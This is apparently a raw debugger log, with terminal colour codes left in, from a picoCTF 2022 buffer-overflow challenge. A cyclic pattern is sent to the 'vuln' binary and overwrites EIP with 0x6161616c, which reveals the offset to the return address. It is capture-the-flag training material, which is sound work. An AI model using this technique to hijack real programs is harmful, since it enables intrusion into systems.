[0;36mgef➤ [0m[0;33mshell cyclic 48[0m
[0;33maaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaa[0m
[0;36mgef➤ [0m[0;33mr[0m
[0;37mStarting program: /home/kali/ctfs/pico22/buffer-overflow-1/vuln[0m
[0;37mPlease enter your string:[0m
[0;33maaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaa[0m
[0;37mOkay, time to return... Fingers Crossed... Jumping to [0;34m0x6161616c[0m

[0;37mProgram received signal [0;31mSIGSEGV[0m, [0;37mSegmentation fault.[0m
[0;34m0x6161616c[0m [0;37min[0m [0;33m??[0m [0;37m()[0m
[0;37m[ Legend: [0;31mModified register[0m [0;37m|[0m [0;31mCode[0m [0;37m|[0m [0;32mHeap[0m [0;37m|[0m [0;35mStack[0m [0;37m|[0m [0;33mString[0m [0;37m][0m
[0;90m───────────────────────────────────────────────────────────────── [0m[0;36mregisters[0m[0;90m ────[0m
[0;31m$eax   [0m: [0;37m0x41[0m
[0;31m$ebx   [0m: [0;34m0x6161616a[0m [0;37m("[0m[0;33mjaaa[0m[0;37m")[0m
[0;31m$ecx   [0m: [0;37m0x41[0m
[0;31m$edx   [0m: [0;37m0xffffffff[0m
[0;31m$esp   [0m: [0;35m0xffffd130[0m  [0;37m→[0m  [0;37m0x00000000[0m
[0;31m$ebp   [0m: [0;34m0x6161616b[0m [0;37m("[0m[0;33mkaaa[0m[0;37m")[0m
[0;31m$esi   [0m: [0;37m0x1[0m
[0;31m$edi   [0m: [0;31m0x80490e0[0m  [0;37m→[0m  [0;90m<_start+0> endbr32 [0m
[0;31m$eip   [0m: [0;34m0x6161616c[0m [0;37m("[0m[0;33mlaaa[0m[0;37m")[0m
[0;34m$cs[0m: [0;37m0x23[0m [0;34m$ss[0m: [0;37m0x2b[0m [0;34m$ds[0m: [0;37m0x2b[0m [0;34m$es[0m: [0;37m0x2b[0m [0;34m$fs[0m: [0;37m0x00[0m [0;31m$gs[0m: [0;37m0x63[0m
[0;90m─────────────────────────────────────────────────────────────── [0m[0;36mcode:x86:32[0m[0;90m ────[0m
[0;31m[!][0m [0;37mCannot disassemble from $PC[0m
[0;31m[!][0m [0;37mCannot access memory at address 0x6161616c[0m
[0;90m─────────────────────────────────────────────────────────────────── [0m[0;36mthreads[0m[0;90m ────[0m
[[0;36m#0[0m] [0;37mId 1, Name: "vuln", [0;31mstopped[0m [0;34m0x6161616c[0m [0;37min[0m [0;33m??[0m [0;37m(), reason:[0m [0;35mSIGSEGV[0m